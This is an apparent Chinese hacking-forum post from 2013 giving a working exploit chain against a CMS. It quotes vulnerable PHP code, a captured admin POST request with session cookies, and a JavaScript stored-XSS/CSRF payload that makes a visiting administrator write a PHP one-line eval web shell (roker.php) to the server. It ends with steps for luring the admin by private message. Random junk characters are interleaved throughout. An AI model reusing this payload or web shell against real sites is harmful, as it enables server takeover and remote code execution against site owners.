|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
4 H5 x* j u, Q5 G6 R官网已经修补了,所以重新下了源码
( q. k9 Y& k$ k因为 后台登入 还需要认证码 所以 注入就没看了。( n6 M( p' s0 D% Q8 J& X0 V5 z3 `
存在 xss
) v: S& [# O% _漏洞文件 user/member/skin_edit.php
3 l- @, n3 `+ t3 w; T本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:. T& c& m' s, N: a& X
+ G m' I4 a+ b</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
# L7 R9 `2 Z( s
2 m9 S& n2 e4 R. v- G+ u</textarea></td></tr>. ]/ a% z+ E* z/ M# D
3 X' l7 v1 U8 U5 a6 @, T+ {2 H4 E. s* z user/do.php " k; o; s: F/ u8 |
/ O0 u0 t& q' a* q/ z7 A
: ~. I/ p0 }1 C \0 V' c1 fif($op=='zl'){ //资料. P6 q3 V. y$ v! w
& J4 s d/ w9 b7 d; ]
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
+ Y, o8 N& t+ u! r exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
6 Y+ G! _9 e, z+ Y7 e + \7 f; E) {$ U9 T
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."', J9 X8 y# `$ n1 r5 Z) h$ V. @
4 \& m% `6 j$ l" |, m CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'/ x7 `6 f" f+ b: @; M H
where CS_Name='".$cscms_name."'";
4 E( o3 g. ?+ M9 I( N' ` 2 [. H( V/ K8 w- o* j; `
if($db->query($sql)){' l; Q; H! w6 i, E. u; L5 Q
4 E, ~* J4 t9 c, t) |) _# ]* k exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));, j' P2 B2 y- I% i
7 g- ~8 ]! _" A- \! P# @
}else{
% \0 l5 c" P& o+ L' k' X) T % Y1 ]2 ]% o3 z
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
|8 R! U% E; W& [! K
1 W! O- ~! k7 \. b }" _4 B& x R7 P7 z
) ^6 E7 Y& v3 U7 Y+ x
% l: N B$ G( o2 r没有 过滤导致xss产生。" [3 ?0 n# Z7 ]' I; |. S/ I
后台 看了下 很奇葩的是可以写任意格式文件。。
0 w% w3 Y; R# t# G- n" W抓包。。
) e1 O/ c& _' z3 V6 }4 v8 H3 L; O
1 J' }; S& |; l; Y; L" F5 M; v) s5 ~" n5 d; o- W* c
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
, c. L" v u0 a2 L 4 D% v& ?; C3 G& Z6 D o# r
Accept: text/html, application/xhtml+xml, */*
- d9 ?. _+ n9 P9 w/ _
( }, N% Y# r% H, H9 \4 r1 }Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
& O* \: _0 e$ i* c7 r7 ^* j! O1 ] ; V/ {7 |) [ w3 G) Y ] g. R
Accept-Language: zh-CN
4 a5 V, m& P0 g1 G 4 m0 h( Y5 ^; r2 \- \3 r4 P
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)- k7 @& n9 \, |: u* G7 U
% |, z# D2 y, {
Content-Type: application/x-www-form-urlencoded
: f* `: d2 J' ~+ K# V# g8 ^1 X' n! K3 u \/ o7 w J, h4 c
Accept-Encoding: gzip, deflate
9 p, B* K& v4 ^5 D
6 X, J( A' {1 \/ T7 DHost: 127.0.0.1
! C P$ n: ^* C2 ~0 k/ C 7 @5 Y1 S8 Z' ]/ @# S* m& G
Content-Length: 389 r; f7 A4 w$ `- r$ `, A2 X. y
7 u6 e/ H" K) d8 N# ODNT: 1
[. d( H- Y( X6 ~3 h. ]
8 [4 p% ~, Q ]Connection: Keep-Alive
' h. u) p: k% l* [4 h" `
m1 \3 f* L5 A2 N MCache-Control: no-cache
) M$ w. i- E/ M
" m F: \% _) ACookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594; c! X: _; f9 r* D2 a- z0 R* r( j
6 X0 e3 b2 l# [- M
5 J F' q \$ S; H4 y1 z6 L
name=aaa.php&content=%3Cs%3E%3Ca%25%3E
9 i4 ?, Q0 {0 [' I& G% D6 V' X$ j4 z+ y5 C. m
' Q, m; I5 `3 X3 Z5 v* |
8 z0 }) P& S" f( X- e7 @- _4 n于是 构造js如下。' Y7 N* T! T+ C
7 A; u5 ^; j+ N: n本帖隐藏的内容<script> 2 p, i/ q1 k4 z( l! ?7 I" b
thisTHost = top.location.hostname;% L, }7 ?& e( I6 u) h9 e9 T0 w
8 C9 R* t) @: S CthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";; ?' O4 g- `" F! P
/ g; w- Z3 B! S* ~8 Q
function PostSubmit(url, data, msg) {
9 F: g6 N3 j6 N7 T" B! O4 |, | var postUrl = url;
. G/ p1 q0 j: d1 c " F* o- d& i. v7 Z. z m
var postData = data;
7 Q+ a- y) O, m- T; H; f/ U0 B" @ var msgData = msg;
+ S1 }+ [. ?+ ~/ u, F4 X) O( u var ExportForm = document.createElement("FORM"); , B2 s6 k/ }% N
document.body.appendChild(ExportForm); : }0 ?7 l7 l7 {
ExportForm.method = "POST"; ! k x' ]7 }9 \& G$ D4 \+ `( ]
var newElement = document.createElement("input");
, X% T5 R8 p2 K( W newElement.setAttribute("name", "name");
- W6 a: {. C" J' O' ?1 N newElement.setAttribute("type", "hidden");
7 F+ h; U/ q3 J6 s A- E* f, h var newElement2 = document.createElement("input");
! W5 Y% H* l3 e2 [- _8 \ newElement2.setAttribute("name", "content");
4 Y8 N) F) A& w/ p2 q/ l newElement2.setAttribute("type", "hidden"); $ s( s( z' v5 O0 k/ D8 X2 x
ExportForm.appendChild(newElement); + U* B1 `- y$ D- [& K" t, D
ExportForm.appendChild(newElement2); / t3 Y. e$ I4 |1 b, d. A" M$ K
newElement.value = postData;
) q1 Z' b4 ^# \! E7 y7 w newElement2.value = msgData;
: J' j( b+ K) x% i. ? ExportForm.action = postUrl;
7 g7 Y! }0 [/ ~6 z3 e0 F; a ExportForm.submit();
% K! P' X1 R! f/ q. {) l Y# L$ K7 b; ]};9 O5 ^4 J& H2 D( b
: e/ f1 ~) y! y2 G* [: S
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
' K/ P" E( T- A3 d) ^ ) {( e* F6 ?8 i# k: |8 C- @
</script>6 Y- }* _# _; g) b
1 q7 A$ N. `3 J$ e; k% Z0 [3 v
# J, i$ S2 `9 p9 A
* n2 m( M; L5 x" Uhttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入& c6 z8 q& e; l3 _# t
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
' \2 L2 R( d9 K7 x* Z1 Q就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
2 i; Y" L) o3 u4 R |
|
发表于 2013-11-6 18:09:37
收藏
支持
反对